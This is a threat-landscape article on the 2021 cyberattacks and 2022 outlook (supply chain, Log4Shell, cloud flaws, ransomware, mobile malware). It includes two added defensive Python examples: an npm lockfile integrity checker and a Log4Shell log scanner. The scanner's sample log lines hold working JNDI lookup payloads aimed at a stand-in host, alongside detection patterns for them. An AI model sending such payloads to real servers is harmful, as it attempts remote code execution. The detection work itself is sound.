The last couple of years have been far from ordinary, both for cybersecurity and business in general. The COVID-19 pandemic has permanently changed how business is done, and cybercriminals have adapted to these changes, tailoring their tactics to the new reality.
While 2020 and 2021 have been exceptional years for cyberattacks, there is little indication that things will return to “normal” in 2022. Cyber threat actors have tried new tactics and techniques, found them to be successful, and added them to their core arsenal.
In 2021, several cyberattack campaigns and cyber threat actors became household names as the impacts of cyberattack were felt far beyond their target companies. The modern threat landscape is composed of bigger, flashier, and higher-impact attacks as cybercrime becomes increasingly professionalized and cyber threat actors look to extract maximum value or impact from their attacks.
Below, we take a closer look at the major challenges that businesses faced through 2021, and what they can expect in 2022.
Every year, certain threats grow rapidly as cybercriminals focus their efforts on a particularly effective or lucrative attack technique, such as ransomware or cryptojacking. However, one of the most worrying trends in 2021 was the growth of cybercrime across the board.
In 2021, the total number of cyberattacks increased by 50% year over year. However, certain areas were harder hit than others, with education, research, and healthcare bearing the brunt of the damage. This indicates a focus by cyber threat actors on the areas that are rapidly growing more reliant on technology and least prepared to protect themselves against cyber threats.
Such rapid growth in attacks bodes ill for 2022. As cyber threat actors refine their techniques and leverage machine learning and automation, the number and impact of attacks are only likely to grow.
Supply chain attacks rose to prominence in late 2020, grew through 2021, and are likely to continue to be a major threat in 2022. In December 2020, the discovery of the SolarWinds hack led this trend.
Threat actors compromised SolarWinds’ development environment and inserted backdoor code into its Orion network monitoring product. The discovery of the Sunburst malware kicked off an extended investigation that uncovered not only the details of the SolarWinds hack but also multiple malware variants and an attack campaign that impacted over 18,000 public and private sector organizations.
SolarWinds kicked off a surge in supply chain attacks that continued throughout 2021 and into 2022. Another high-visibility supply chain exploit in 2021 was the Kaseya attack, which leveraged the relationships between managed service providers (MSPs) and customers to distribute ransomware using MSPs’ remote monitoring and management software. A few months later, an attacker with access to the npm account of a widely-used library (ua-parser.js) modified the code so that malware was installed on the systems of anyone who downloaded and used the malicious version of the library.
While these and other 2021 supply chain attacks had a far-reaching impact, the most famous is likely the exploitation of the Log4j zero-day vulnerability. Log4j is a widely-used Apache logging library, and the zero-day vulnerability allowed an attacker who could control the contents of log messages or their parameters to achieve remote code execution. This “Log4Shell” flaw was widely exploited, with Check Point Research detecting about 40,000 attempted attacks within two hours of it becoming public and over 830,000 attempts within the first three days.
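The ua-parser.js incident works because a project that resolves a dependency by name and version range will happily install whatever the registry currently serves under that name. The defence is to pin each dependency to the hash of the exact artifact that was reviewed and to fail the build when the artifact changes. The example below is added here and is not Check Point's, npm's or the ua-parser.js project's code; it reproduces npm's real lockfile convention (an `integrity` field in SSRI form, `<algorithm>-<base64 digest>`, under `packages` in a version 2 `package-lock.json`) but the lockfile fragment, the package name `some-library`, the registry URL and the tarball bytes are constructed for illustration.

```python
"""Verify a package tarball against the integrity value pinned in package-lock.json.

Added example, not the page's or npm's own code. Assumes npm's lockfile layout:
"packages" -> "<path>" -> {"version", "resolved", "integrity"}, where integrity
is "<algorithm>-<base64 digest>". All data below is constructed.
"""
import base64
import hashlib
import hmac
import json
from typing import List, Optional

# Constructed tarballs: the bytes a registry served when the dependency was
# first reviewed, and a later response in which extra code has been appended.
GOOD_TARBALL = b"constructed tarball bytes for some-library 1.2.3"
TAMPERED_TARBALL = GOOD_TARBALL + b"\n// constructed: unexpected addition"


def sri(data: bytes, algorithm: str = "sha512") -> str:
    """Build an SSRI string ("sha512-<base64>") for the given bytes."""
    digest = hashlib.new(algorithm, data).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


# Constructed lockfile fragment. In a real repository the integrity value is
# written by npm when the dependency is added and committed with the code;
# here it is derived from GOOD_TARBALL so the example is self-contained.
LOCKFILE = json.dumps({
    "name": "example-app",
    "lockfileVersion": 2,
    "packages": {
        "node_modules/some-library": {
            "version": "1.2.3",
            "resolved": "https://registry.example/some-library/-/some-library-1.2.3.tgz",
            "integrity": sri(GOOD_TARBALL),
        },
        # A dependency that was never pinned: nothing to check it against.
        "node_modules/unpinned-library": {
            "version": "0.9.0",
            "resolved": "https://registry.example/unpinned-library/-/unpinned-library-0.9.0.tgz",
        },
    },
})


def verify_package(lockfile_json: str, package_path: str, tarball: bytes) -> bool:
    """Return True only if the tarball matches the integrity pinned for package_path.

    A missing entry or a missing integrity field is a failure, not a pass:
    an unpinned dependency is exactly the gap a registry-side substitution exploits.
    """
    lock = json.loads(lockfile_json)
    entry = lock.get("packages", {}).get(package_path)
    if not entry or "integrity" not in entry:
        return False
    algorithm, _, expected_b64 = entry["integrity"].partition("-")
    try:
        expected = base64.b64decode(expected_b64, validate=True)
        actual = hashlib.new(algorithm, tarball).digest()
    except (ValueError, TypeError):
        return False  # malformed integrity string or unknown algorithm
    return hmac.compare_digest(actual, expected)


def unpinned_packages(lockfile_json: str) -> List[str]:
    """List lockfile entries that carry no integrity value and so cannot be verified."""
    lock = json.loads(lockfile_json)
    return sorted(
        path for path, entry in lock.get("packages", {}).items()
        if "integrity" not in entry
    )


if __name__ == "__main__":
    path = "node_modules/some-library"
    print("pinned release verifies:", verify_package(LOCKFILE, path, GOOD_TARBALL))
    print("modified release verifies:", verify_package(LOCKFILE, path, TAMPERED_TARBALL))
    print("unpinned entries:", unpinned_packages(LOCKFILE))
```

The check is only as good as the pin: `unpinned_packages` exists because a lockfile entry without an `integrity` field gives no protection at all, and a CI job that runs these two functions before install should fail on either a mismatch or an unpinned entry.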
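Because Log4Shell is triggered by attacker-supplied text reaching a logger, the request fields that web servers routinely log (the request line, Referer and User-Agent) are where a defender first looks for exploitation attempts. The script below is an added example, not Check Point's code or detection logic: it parses the standard combined log format, decodes percent-encoding before matching, and flags any Log4j lookup syntax, treating a `jndi:` prefix as a direct hit and any other lookup prefix as worth review. The log lines are constructed, and the addresses come from the RFC 5737 documentation ranges.

```python
"""Flag Log4j lookup strings in web server access logs.

Added example, not Check Point's or any product's code. Assumes the
Apache/Nginx "combined" log format; sample lines are constructed.
"""
import re
from collections import Counter, defaultdict
from typing import Dict, Iterable, Optional
from urllib.parse import unquote

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Log4j lookup syntax is ${prefix:...}. The jndi prefix is what Log4Shell abuses;
# any lookup prefix in client-supplied input is still unexpected and worth a look.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
ANY_LOOKUP = re.compile(r"\$\{\s*[a-z0-9_\-]+\s*:", re.IGNORECASE)

# Constructed sample: one benign request, three probes from one source
# (User-Agent, request path, percent-encoded query string), one generic lookup.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.4:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET /${JNDI:rmi://198.51.100.4/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.9 - - [10/Dec/2021:14:02:17 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.4%2Fc%7D HTTP/1.1" 200 0 "-" "curl/7.68.0"',
    '203.0.113.11 - - [10/Dec/2021:14:03:01 +0000] "GET /search?q=${env:USER} HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]


def classify(text: str) -> Optional[str]:
    """Return 'jndi', 'lookup' or None for one client-controlled field."""
    decoded = unquote(text)  # match on the decoded form, not the raw bytes logged
    if JNDI_LOOKUP.search(decoded):
        return "jndi"
    if ANY_LOOKUP.search(decoded):
        return "lookup"
    return None


def scan(lines: Iterable[str]) -> Dict[str, Counter]:
    """Map client IP -> Counter of findings across the fields a client controls."""
    findings: Dict[str, Counter] = defaultdict(Counter)
    for line in lines:
        match = COMBINED.match(line)
        if not match:
            continue  # unparseable line; a production pipeline would count these too
        for field in ("request", "referer", "agent"):
            verdict = classify(match.group(field))
            if verdict:
                findings[match.group("ip")][verdict] += 1
    return dict(findings)


if __name__ == "__main__":
    for ip, counts in scan(SAMPLE_LOG).items():
        print(ip, dict(counts))
```

Matching on the decoded field is the part most often missed: the raw log line for the third probe contains no literal `${`, so a grep for the obvious string would report two hits from that source instead of three. The output is a per-source count rather than a per-line alert so that the same client probing several fields is seen as one campaign.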
The high-profile supply chain attacks of 2021 have demonstrated that it is a viable and potentially profitable attack vector for cyber threat actors. Going into 2022, cyber threat actors are likely to expand their use of supply chain attacks to amplify the reach and impact of their attacks.
The COVID-19 pandemic drove a dramatic shift in how business was done. Instead of employees primarily working from the corporate office, a much greater percentage of the workforce is working remotely and is likely to continue to do so for the foreseeable future.
The pandemic kicked off a cyber pandemic as cyber threat actors adapted to and took advantage of changes in corporate IT operations. The rise of remote work made employees’ computers – often personal devices – a company’s first line of defense, and the surge in cloud adoption to support the remote workforce and meet digital transformation goals created new attack vectors for cyber threat actors.
Two years into the pandemic, little has changed. Many companies are still supporting a mostly or wholly remote workforce, and cloud adoption continues to grow. As cybercriminals continue to take advantage of the vulnerabilities and security gaps caused by this rapid IT transformation, companies struggle to secure their systems and protect corporate and customer data.
With the pandemic-inspired shift to remote work came a rapid adoption of cloud-based infrastructure and services. Software as a Service (SaaS) solutions closed crucial gaps – such as the need for online meetings and file sharing – and cloud-based infrastructure was more accessible and easier for a remote workforce to manage.
Since the rapid shift to remote work and the cloud in 2020, companies have had the opportunity to close many of the biggest security issues caused by a rapid transition with little or no advance planning. However, some cloud security gaps still remain, and cyber threat actors continue to work to outpace security personnel at taking advantage of the newly vital role that cloud computing holds in the modern business.
Many of these attacks target vulnerabilities in the cloud infrastructure itself, allowing an attacker to exploit many targets with a single vulnerability. In September 2021, the OMIGOD vulnerability was discovered. Exploitation of Microsoft’s Open Management Infrastructure (OMI) software agents embedded within Azure VMs could have enabled attacks against up to 65% of Azure customers until it was patched.
OMIGOD was not the only security issue discovered in Azure in 2021. The ChaosDB vulnerability discovered in August provided complete control over Azure Cosmos DB clients’ cloud resources through a compromised key. Azurescape targeted Azure’s Container as a Service (CaaS) offering and enabled exploitation of other customers’ Kubernetes clusters within the same public cloud service. While Azurescape was patched before it was exploited, the potential fallout could have been significant.
Azure is not the only cloud service that suffered from vulnerabilities and attacks in 2021. A vulnerability in Google’s Compute Engine (GCE), used in Google Cloud’s Infrastructure as a Service (IaaS) offering, could have allowed complete takeovers of hosted VMs. HTTP header smuggling attacks against AWS’s API Gateway and Cognito (its authentication provider) can evade access restrictions and enable cache poisoning. A configuration error in AWS permissions could allow AWS support personnel to read data stored in S3 buckets rather than just the metadata.
With increased cloud adoption comes increased scrutiny, both by ethical hackers and cyber threat actors. The record of 2021 suggests that more cloud security issues are likely to be discovered in 2022 and beyond.
Ransomware rose to prominence with the WannaCry outbreak in 2017. Since then, many ransomware groups have emerged, making it a top-of-mind and expensive threat for all businesses.
In 2021, ransomware groups demonstrated their ability and willingness to impact organizations beyond their direct targets. The Colonial Pipeline hack is the most obvious example of this, as the DarkSide ransomware group caused a weeklong shutdown of one of the main pipelines servicing the US East Coast.
However, Colonial Pipeline, while possibly the most visible ransomware attack of 2021, is far from the only one. Another attack in the same month targeted JBS S.A., the biggest meat processing company in the world. This attack had international impacts, causing shutdowns of plants in the US and abattoirs in Australia that resulted in cancellations of 3,000 workers’ shifts and furloughs of 7,000 employees.
Beyond these high-profile attacks, ransomware groups also heavily targeted the education and healthcare sectors. These attacks caused school closures, loss of sensitive educational and healthcare information, and the delay of elective and non-emergency medical procedures. Multiple attacks by hacktivists caused public disruption in Iran by targeting railways and gas stations.
Ransomware attacks have proven to be effective and profitable for attackers. Unless this changes, they will continue to be a leading cyber threat for organizations.
Another impact of the shift to remote work was the widespread adoption of Bring-Your-Own-Device (BYOD) policies. By allowing employees to work from personal devices, companies may have improved productivity and employee retention but also lost vital security visibility and the ability to respond to infections that threaten corporate systems and solutions.
The upswing in mobile device usage has also made cyberespionage tools like Pegasus more effective and dangerous. Developed by the NSO Group, the malware uses several zero-click exploits to gain access to target devices before taking them over and collecting data from various sources (texts, phone, email, etc.). Pegasus is officially available only to governments, law enforcement, etc., but has a history of being abused to target journalists, activists, government officials, and business executives. Inspired by Pegasus’s success, Cytrox, a North Macedonian company, now offers a similar tool called Predator, and this threat is likely to spread to common cyber threat actors as well.
In 2021, cybercriminals adapted their tactics to take advantage of growing mobile adoption. Several mobile malware Trojans have emerged, including the FlyTrap, Triada, and MasterFred malware. These mobile Trojans take advantage of social media, weak app store security controls, and similar techniques to gain access and the necessary permissions on target devices.
Mobile malware and cyber threat actors have also adopted smishing tactics, sending phishing content over SMS messages rather than email. The FluBot Android botnet is notorious for this, even using a text message about a fake FluBot infection to spread itself. Smishing attacks have caught on because they require few technical skills and are relatively inexpensive, with phishing kits selling for $50-100 US.
Mobile devices have become a new front in the fight against cybercrime. For the modern business, mobile security is a key part of a corporate cybersecurity strategy.
2021 demonstrated that cyber threat actors are adapting their techniques to fit a changing world and reflect a maturing industry. Instead of remaining in the shadows, cybercriminals are pulling off massive supply chain attacks with global impacts, disrupting key industries with ransomware attacks, and molding their tactics to an increasingly mobile and cloud-centric workforce.
In 2022, companies can expect to face sophisticated attacks that target every part of their IT infrastructure, especially where they are weakest. Companies lack crucial visibility and control in the cloud and on BYOD devices, so those are cybercriminals’ prime targets.
Defending against modern cyber threat campaigns requires the ability to respond quickly and correctly to rapidly-evolving attacks that can strike anywhere within an organization’s IT infrastructure. Organizations need comprehensive security visibility, access to real-time threat intelligence, and an integrated security architecture that can support automated and coordinated threat prevention and response across the entire corporate IT infrastructure.
Learn how to develop your organization’s immunity to modern, 5th-generation cyber-attacks and threats by adopting the strategies and recommendations in the 2022 Cyber Security Report today. Start tackling the problem by identifying your company’s security blind spots and weak points with Check Point’s Security Checkup.